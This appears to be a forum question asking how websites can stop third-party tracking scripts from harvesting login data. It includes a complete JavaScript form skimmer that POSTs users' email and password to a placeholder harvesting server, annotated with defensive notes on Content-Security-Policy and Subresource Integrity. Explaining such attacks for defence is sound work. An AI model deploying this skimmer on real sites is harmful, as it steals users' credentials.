If the following JavaScript code were added to the stackoverflow.com login page, then each time a user clicked login, the form data entered would be sent off to a third-party website via a POST request. I think this may be common on many other websites as well. With the modern proliferation of “marketing tools” like Google Tag Manager, for example, how can website owners make sure small script snippets like the one below are not secretly harvesting customer data? Can websites do anything to encrypt the password entered in the form box?
The only thing I can think of is requiring a thorough review of any tracking code that the marketing department wants to implement. Can someone please help me understand whether a more elegant solution exists?
// Hooks the login button's click event and calls getPW() on every click.
// Any script that runs in the page's origin can register a listener like
// this, so the form itself cannot tell a benign handler from a harvesting
// one; the control point is which scripts are allowed to run at all
// (Content-Security-Policy script-src, Subresource Integrity on third-party
// tags) and where they are allowed to send data (connect-src).
const elementToTrack = document.querySelector('#submit-button');
elementToTrack.addEventListener('click', () => {
getPW();
});
/**
 * Reads every field of #login-form and POSTs the `email` and `password`
 * entries to a third-party origin.
 *
 * Nothing here is privileged: it uses only the public FormData and fetch
 * APIs, with the same DOM access as the page's own code. That is why
 * "encrypting the password in the form box" does not help against a script
 * already running in the page — it reads the plaintext value directly.
 * The mitigations live outside this snippet: a Content-Security-Policy
 * whose connect-src lists only the site's own API origin causes the
 * fetch() below to be blocked by the browser, and script-src / Subresource
 * Integrity limit which scripts can execute in the first place. For code
 * review of tracking snippets, the pattern to look for is form data being
 * read and sent to an origin that is not the site's own.
 *
 * No parameters, no return value; the fetch() promise is neither awaited
 * nor error-handled, so the request is fire-and-forget.
 */
function getPW() {
// Snapshot of every field of the login form at click time.
var data = new FormData( document.getElementById('login-form') );
data = data.entries();
var obj = data.next();
var retrieved = {};
// Copies [name, value] pairs into a plain object until the iterator is
// exhausted (next() then yields an entry whose value is undefined).
while(undefined !== obj.value) {
retrieved[obj.value[0]] = obj.value[1];
obj = data.next();
}
let pw = retrieved.password;
let email = retrieved.email;
/*just using a placeholder url for illustrative purposes */
// Exfiltration point: an unconditional cross-origin POST issued on every
// click, independent of whether the form's own submission succeeds.
// connect-src is the CSP directive that governs this destination.
fetch("https://somerandomserver.com/api/passwordHarvester", {
method: "POST",
body: JSON.stringify({
email: email,
password: pw
}),
headers: {
"Content-type": "application/json; charset=UTF-8"
}
});
}